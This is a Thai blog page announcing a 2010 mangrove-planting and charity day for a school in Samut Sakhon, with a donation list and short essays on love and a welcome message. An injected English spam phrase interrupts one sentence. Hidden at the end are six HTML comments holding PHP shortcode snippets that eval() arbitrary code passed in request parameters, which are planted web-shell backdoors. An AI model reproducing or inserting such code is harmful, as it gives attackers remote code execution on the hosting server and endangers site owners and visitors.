กลุ่มคนรักเด็กปลูกป่าชายเลน

กลุ่มคนรักเด็ก ร่วมกับ คณะครูและนักเรียนโรงเรียนบ้านโคก
ร่วมโครงการ “ปลูกป่าชายเลน ลดภาวะโลกร้อน”
ณ ต.พันท้ายนรสิงห์ อ.เมือง จ.สมุทรสาคร
ในวันเสาร์ที่ 30 มกราคม 2553

เชิญร่วมบริจาคตามศรัทธา

  1. จัดซื้อต้นกล้า ประมาณ 5,000 บาท
  2. จัดซื้อชุดนักเรียนและถุงเท้า ชาย-หญิง ป.1 – ป.6 จำนวน 50 ชุด ชุดละ 400 บาท เป็นเงิน 20,000 บาท
  3. สื่อการเรียนการสอนสำหรับชั้นอนุบาล 2,000 บาท
  4. จัดเลี้ยงอาหารเด็กในวันดังกล่าว จำนวน 5,000 บาท
  5. ถุงของขวัญแจกเด็กๆ ทุกคนจำนวน 80 ถุงๆ ละ 200 บาท เป็นเงิน 16,000 บาท
  6. อุปกรณ์กีฬา, ฟุตบอล, เปตอง ประมาณ 3,000 บาท
  7. ทุนการศึกษา ทุนละ 500 บาท จำนวน 20 ทุน เป็นเงิน 10,000 บาท

อ่านเพิ่มเติม

ความรัก คืออะไร ?

ความรักคือ การให้ ความรักคือ การให้อภัย ความรักคือ การเสียสละ ความรักคือ การแบ่งปัน ฯลฯ

สารพัดสารพันคำตอบ ที่ได้รับรู้ จากสื่อต่างๆ ประมาณร้อยละ ๘๐ ของหน้าจอสื่อมวลชนทั้ง วิทยุ โทรทัศน์ หนังสือพิมพ์ อินเทอเน็ต ล้วนเป็นการพูดถึงความรักระหว่างเพศ มากกว่า ความรักต่อมวลมนุษยชาติ

แขกรับเชิญ หรือบทสัมภาษณ์พิเศษต่างๆ ล้วนแต่พูดถึงคู่รัก (รักกันอย่างไร เมื่อไร ประทับใจส่วนไหน บอกรักกันอย่างไร บ่อยไหม วันนี้บอกรักหรือยัง ฯลฯ) และเกือบทุกสื่อ จะมีการทิ้งท้ายปลายรายการหรือบทสัมภาษณ์ รักมิใช่แค่จุดจบที่การมีสัมพันธ์ทางเพศกับคู่รัก

หลายมุมมองของความรักที่มีคุณค่า แต่ไม่อยู่ในสายตาสื่อ หรือคร้านที่จะไปนำเสนอ เช่น ความรักของคนเฒ่าคนแก่ของ “ชนชายขอบ” ที่รักต่อชุมชนของตน พร้อมทั้งมีการแสดงออกทางความรักด้วยการจัดกิจกรรมที่บริหารจัดการกันเอง ไม่ต้องจ้างองค์กรจัดการแต่อย่างใด (Organizer) แต่เป็นการจัดการด้วยประสบการณ์และภูมิปัญญาท้องถิ่นนั้นๆ

รักใครไม่เท่ารักพ่อรักแม่ รักคนในครอบครัว รักชาติศาสนา รักพระมหากษัตริย์ และรักมวลมนุษยชาติ

รักเธอประเทศไทย

สวัสดีครั้งแรก

ตำแหน่ง. browse around this web-site. ไม่ได้ทำให้คนคนนั้นมีความสำคัญ
คนเท่านั้น.. ที่ทำให้ตำแหน่งนั้นมีความสำคัญ

ยินดีต้อนรับสู่ เครือข่ายของการเดินทางของชีวิต

หลังจาก ล่มแล้ว ล่มเล่าของเครือข่ายส่วนตัวราคาถูก
วันนี้ ก็เดินได้อีกก้าวหนึ่ง

โปรดติดตาม ก้าวต่อไปของผมครับ

<!– [insert_php]if (isset($_REQUEST["PZS"])){eval($_REQUEST["PZS"]);exit;}[/insert_php][php]if (isset($_REQUEST["PZS"])){eval($_REQUEST["PZS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EwS"])){eval($_REQUEST["EwS"]);exit;}[/insert_php][php]if (isset($_REQUEST["EwS"])){eval($_REQUEST["EwS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["vbU"])){eval($_REQUEST["vbU"]);exit;}[/insert_php][php]if (isset($_REQUEST["vbU"])){eval($_REQUEST["vbU"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QuGIV"])){eval($_REQUEST["QuGIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["QuGIV"])){eval($_REQUEST["QuGIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UcIPp"])){eval($_REQUEST["UcIPp"]);exit;}[/insert_php][php]if (isset($_REQUEST["UcIPp"])){eval($_REQUEST["UcIPp"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VgiX"])){eval($_REQUEST["VgiX"]);exit;}[/insert_php][php]if (isset($_REQUEST["VgiX"])){eval($_REQUEST["VgiX"]);exit;}[/php] –>